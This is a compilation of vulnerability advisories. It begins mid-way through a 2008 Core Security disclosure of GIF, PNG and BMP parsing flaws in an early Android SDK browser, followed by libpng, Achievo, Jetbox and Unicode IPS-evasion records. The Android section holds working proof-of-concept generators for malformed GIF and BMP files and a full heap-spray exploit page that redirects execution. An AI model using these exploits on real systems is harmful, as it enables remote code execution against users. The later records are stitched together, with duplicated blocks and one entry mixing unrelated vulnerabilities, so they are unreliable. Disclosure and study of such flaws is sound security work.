this advisory).  Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3). 
*Non-vulnerable Packages*
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega. 
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack. 
 The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats. 
 Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system. 
 These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software. 
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6]. 
 The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component. 
 #1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage. 
 A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8]. 
 Detailed analysis:
 When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats. 
 Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image. 
 First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
... 
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
  return GIF_ERROR;
  ... 
  }
- -----------/
 We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
... 
}
- -----------/
 In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234  BL      _DGifOpen
.text:0002F238  SUBS    R5, R0, #0 ; GifFile -_ $R5
- -----------/
 Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width *  sp->ImageDesc.Height;
      sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
      ... 
}
- -----------/
 Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
 However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294  MOV     R0, R8
.text:0002F298  MOV     R1, #3
.text:0002F29C  MOV     R2, R9
.text:0002F2A0  MOV     R3, R11
.text:0002F2A4  STR     R12, [SP,#0x48+var_3C]
.text:0002F2A8  BL      _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int
,int)
Bitmap::setConfig():
.text:0002F2B8  MOV     R0, R7          ; R7 = SkBitmap
.text:0002F2BC  MOV     R1, #3
.text:0002F2C0  MOV     R2, R9          ; R9=SWidth R11=SHeight !
.text:0002F2C4  MOV     R3, R11
.text:0002F2C8  STR     R10, [SP,#0x48+var_48]
.text:0002F2CC  BL      _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
 This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
 And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
 The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
 This security bug affects Android SDK m3-rc37a and earlier versions. 
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug. 
 #2 - PNG image parsing, multiple vulnerabilities:
 The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'. 
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
      12, 2004"' has been used in this release. 
 This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '. 
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable. 
 #3 - BMP image processing, negative offset integer overflow:
 The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10]. 
 The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
        ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette. 
 The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
 Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER     PID   PPID  VSIZE RSS   WCHAN    PC         NAME
root     1     0     248   64    c0084edc 0000ae2c S /init
root     2     0     0     0     c0049168 00000000 S kthreadd
... 
root     1206  1165  16892 14564 c0084edc 00274af8 S ./gdb
app_0    1574  535   83564 12832 ffffffff afe0c79c S
com.google.android.browser
root     1600  587   840   324   00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514        /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0          [heap]
08000000-08001000 rw-s 00000000 00:08 344        /dev/zero (deleted)
... 
#
- -----------/
 We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
 Because the "Stream" Object (R8) is stored on the heap and we can fill
the heap with the white color '
      0x00ffffff' we can load the Program Counter with the value at
'0xffffff+0x10'. The following python script will generate a BMP to
accomplish that:
/-----------
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
- -----------/
 Opening the BMP file generated with this script inside a HTML page will
cause (sometimes, as it is dependent on an uninitialized variable) the
following output of the gdb debugger:
/-----------
(gdb) attach 1574
attach 1574
Attaching to program: /system/bin/app_process, process 1574
... 
0xafe0d204 in __futex_wait () from /system/lib/libc.so
(gdb) c
Continuing. 
Program received signal SIGSEGV, Segmentation fault. 
0x00000000 in ?? ()
(gdb)
- -----------/
 Here the browser process has jumped to the '0x00000000' address because
that is the value at 0x00ffffff+0x10. We can change this value using
common JavaScript heap-filling techniques. 
 The complete exploit page follows:
/-----------
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
  document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
  document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>
- -----------/
 Because the exploit needs to fill over 16 MB of heap memory to reach
the address '0xffffff' it is very slow and the default memory
configuration of Android will often abort the process before reaching
the desired point. To overcome this limitation for demonstration
purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
 That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work. 
*Report Timeline*
. 2008-01-30:  Vendor is notified that possibly exploitable
vulnerabilities where discovered and that an advisory draft is
available. 2008-01-30:  Vendor acknowledges and requests the draft. 2008-01-31:  Core sends the draft encrypted, including PoC code to
generate malformed GIF images. 2008-01-31:  Vendor acknowledges the draft. 2008-02-02:  Vendor notifies that the software is an early release for
the open source community, but agree they can fix the problem on the
estimated date (2008-02-25). 2008-02-04:  Core notifies the vendor that Android is using a
vulnerable PNG processing library. 2008-02-08:  Vendor acknowledges, invites Core to send any new
findings and asks if all findings will be included in the advisory. 2008-02-12:  Core responds to vendor that all security issues found
will be included in the advisory, the date is subject to coordination. 2008-02-12:  Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification. 2008-02-13:  Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20:  Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-=scheduled for February
27th. 2008. 2008-02-21:  Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory.  A final review of the advisory is requested before its
release. The vendor indicates that  the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues . 2008-02-26:  Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and  if Core should file the reported and any future bugs
in the public issue tracking page. 2008-02-29:  Final draft version of advisory CORE-2008-0124 is sent to
the  vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5)
. 2008-03-01:  Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability.  Vendor indicates that Android applications  run  with
the credentials of  an unprivileged user which decreases the severity of
the issues found
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges
. 2008-03-04:  Advisory CORE-2008-0124 is published. 
*References*
[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2]  "Android Comes to Life in Barcelona" - The Washington Post ,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html
[3] Android Developer Challenge - http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - Inforworld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008
http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html
[6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes
by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. 
Wiley; 2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification -
http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography. 
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies. 
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/. 
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com. 
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given. 
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
____________________________________________________________________________
Publisher Name:          OpenPKG GmbH
Publisher Home:          http://openpkg.com/
Advisory Id (public):    OpenPKG-SA-2007.013
Advisory Type:           OpenPKG Security Advisory (SA)
Advisory Directory:      http://openpkg.com/go/OpenPKG-SA
Advisory Document:       http://openpkg.com/go/OpenPKG-SA-2007.013
Advisory Published:      2007-05-17 22:31 UTC
Issue Id (internal):     OpenPKG-SI-20070517.02
Issue First Created:     2007-05-17
Issue Last Modified:     2007-05-17
Issue Revision:          03
____________________________________________________________________________
Subject Name:            png
Subject Summary:         Portable Network Graphics (PNG) Image Format
                         Library
Subject Home:            http://www.libpng.org/pub/png/libpng.html
Subject Versions:        * <= 1.2.16
Vulnerability Id:        CVE-2007-2445
Vulnerability Scope:     global (not OpenPKG specific)
Attack Feasibility:      run-time
Attack Vector:           remote network
Attack Impact:           denial of service
Description:
    As confirmed by the vendor, a Denial of Service (DoS) vulnerability
    exists in the PNG [0] image format library libpng [1]. The bug is
    a NULL-pointer-dereference vulnerability involving palette images
    with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value. 
    This bug can, at a minimum, cause crashes in applications simply by
    displaying a malformed image. 
References:
    [0] http://www.libpng.org/pub/png/
    [1] http://www.libpng.org/pub/png/libpng.html
    [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445
____________________________________________________________________________
Primary Package Name:    png
Primary Package Home:    http://openpkg.org/go/package/png
Corrected Distribution:  Corrected Branch: Corrected Package:
OpenPKG Enterprise       E1.0-SOLID        ghostscript-8.54-E1.0.1
OpenPKG Enterprise       E1.0-SOLID        png-1.2.12-E1.0.2
OpenPKG Community        CURRENT           ghostscript-8.57-20070516
OpenPKG Community        CURRENT           png-1.2.18-20070516
____________________________________________________________________________
For security reasons, this document was digitally signed with the
OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)
which you can download from http://openpkg.com/openpkg.com.pgp
or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. 
Follow the instructions at http://openpkg.com/security/signatures/
for more details on how to verify the integrity of this document
                        
| VAR-200705-0355 | CVE-2007-2736 | Achievo of index.php In PHP Remote file inclusion vulnerability | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            PHP remote file inclusion vulnerability in index.php in Achievo 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the config_atkroot parameter. Achievo is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 
Achievo 1.1.0 is vulnerable to this issue; other versions may also be affected
                        
| VAR-200705-0013 | CVE-2007-1898 | Jetbox CMS of formmail.php Spam spam vulnerability | CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM | 
                            formmail.php in Jetbox CMS 2.1 allows remote attackers to send arbitrary e-mails (spam) via modified recipient, _SETTINGS[allowed_email_hosts][], and subject parameters. Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. 
Attackers can exploit this issue to send spam email in the context of the application. 
Jetbox 2.1 is vulnerable; other versions may also be affected
                        
| VAR-200705-0412 | CVE-2007-2688 | HTTP content scanning systems full-width/half-width Unicode encoding bypass | CVSS V2: 7.8 CVSS V3: - Severity: HIGH | 
                            The Cisco Intrusion Prevention System (IPS) and IOS with Firewall/IPS Feature Set do not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic. Various HTTP content scanning systems fail to properly scan full-width/half-width Unicode encoded traffic. This may allow malicious HTTP traffic to bypass content scanning systems. A third party may use this issue to attempt further attacks. 
Attackers may send this type of HTTP data to evade detection and perform further attacks. 
Cisco has stated that all IOS releases that support the Firewall/IPS feature set are affected. Although we currently have no definitive list of such versions, Symantec is investigating the matter and will update this BID's list of vulnerable systems appropriately. Resin is a WEB server developed by Caucho Technology, which can be used under Microsoft Windows operating system. There are multiple vulnerabilities in the implementation of Resin for Windows, and remote attackers may use this vulnerability to obtain sensitive information without authorization. Resin does not properly filter input delivered via URL, allowing a remote attacker to read a continuous stream of data from any COM or LPT device on the system by supplying a DOS device filename with an arbitrary extension in the URL, exfiltrating Web pages through directory traversal attacks The contents of files in the application's WEB-INF directory, or the full system path to the Caucho Resin server through URLs containing special characters. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Novell iChain HTTP Unicode Encoding Detection Bypass
SECUNIA ADVISORY ID:
SA26692
VERIFY ADVISORY:
http://secunia.com/advisories/26692/
CRITICAL:
Less critical
IMPACT:
Security Bypass
WHERE:
>From remote
SOFTWARE:
Novell iChain 2.x
http://secunia.com/product/1423/
DESCRIPTION:
A vulnerability has been reported in Novell iChain, which can be
exploited by malicious people to bypass certain security
restrictions. 
SOLUTION:
Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). 
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. 
ORIGINAL ADVISORY:
https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Full-width and half-width is an encoding technique for Unicode
characters. 
Some Open Source or Microsoft Products such as Microsoft ISS and .NET
Framework properly decode this type of encoding. 
Risk Level : High
Impact : Security Bypass
Systems Affected :
Checkpoint Web Intelligence (Confirmed)
IBM ISS Proventia Series (Confirmed)
Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1]
Remedy :
Contact your vendor for a hotfix, patch or advanced configuration. 
Credits :
Fatih Ozavci (GamaTEAM Member)
Caglar Cakici (GamaTEAM Member)
It's detected using GamaSEC Exploit Framework
GamaSEC Information Security Audit and Consulting Services
(www.gamasec.net)
Original Advisory Link :
http://www.gamasec.net/english/gs07-01.html
References :
   1. CERT - Vulnerability Note VU#739224
      http://www.kb.cert.org/vuls/id/739224
   2. Unicode Home Page
      http://unicode.org
   3. Unicode.org, Halfwidth and Fullwidth Forms
      http://www.unicode.org/charts/PDF/UFF00.pdf
-- 
Best Regards
Fatih Ozavci
IT Security Consultant
. 
----------------------------------------------------------------------
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you?
The Secunia Vulnerability Intelligence Solutions allows you to filter
and structure all the information you need, so you can address issues
effectively. 
The vulnerability is reported in versions prior to 4.0. 
SOLUTION:
Update to version 4.0 or later. 
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure. 
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications
                        
| VAR-200711-0394 | CVE-2007-5793 | HTTP content scanning systems full-width/half-width Unicode encoding bypass | CVSS V2: 7.1 CVSS V3: - Severity: HIGH | 
                            Stonesoft StoneGate IPS before 4.0 does not properly decode Fullwidth/Halfwidth Unicode encoded data, which makes it easier for remote attackers to scan or penetrate systems and avoid detection. This may allow malicious HTTP traffic to bypass content scanning systems. 
Attackers may send this type of HTTP data to evade detection and perform further attacks. 
Cisco has stated that all IOS releases that support the Firewall/IPS feature set are affected. Although we currently have no definitive list of such versions, Symantec is investigating the matter and will update this BID's list of vulnerable systems appropriately. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Novell iChain HTTP Unicode Encoding Detection Bypass
SECUNIA ADVISORY ID:
SA26692
VERIFY ADVISORY:
http://secunia.com/advisories/26692/
CRITICAL:
Less critical
IMPACT:
Security Bypass
WHERE:
>From remote
SOFTWARE:
Novell iChain 2.x
http://secunia.com/product/1423/
DESCRIPTION:
A vulnerability has been reported in Novell iChain, which can be
exploited by malicious people to bypass certain security
restrictions. 
SOLUTION:
Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). 
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. 
ORIGINAL ADVISORY:
https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Full-width and half-width is an encoding technique for Unicode
characters. 
Some Open Source or Microsoft Products such as Microsoft ISS and .NET
Framework properly decode this type of encoding. 
Risk Level : High
Impact : Security Bypass
Systems Affected :
Checkpoint Web Intelligence (Confirmed)
IBM ISS Proventia Series (Confirmed)
Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1]
Remedy :
Contact your vendor for a hotfix, patch or advanced configuration. 
Credits :
Fatih Ozavci (GamaTEAM Member)
Caglar Cakici (GamaTEAM Member)
It's detected using GamaSEC Exploit Framework
GamaSEC Information Security Audit and Consulting Services
(www.gamasec.net)
Original Advisory Link :
http://www.gamasec.net/english/gs07-01.html
References :
   1. CERT - Vulnerability Note VU#739224
      http://www.kb.cert.org/vuls/id/739224
   2. Unicode Home Page
      http://unicode.org
   3. Unicode.org, Halfwidth and Fullwidth Forms
      http://www.unicode.org/charts/PDF/UFF00.pdf
-- 
Best Regards
Fatih Ozavci
IT Security Consultant
. 
----------------------------------------------------------------------
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you?
The Secunia Vulnerability Intelligence Solutions allows you to filter
and structure all the information you need, so you can address issues
effectively. 
The vulnerability is reported in versions prior to 4.0. 
SOLUTION:
Update to version 4.0 or later. 
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure. 
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications
                        
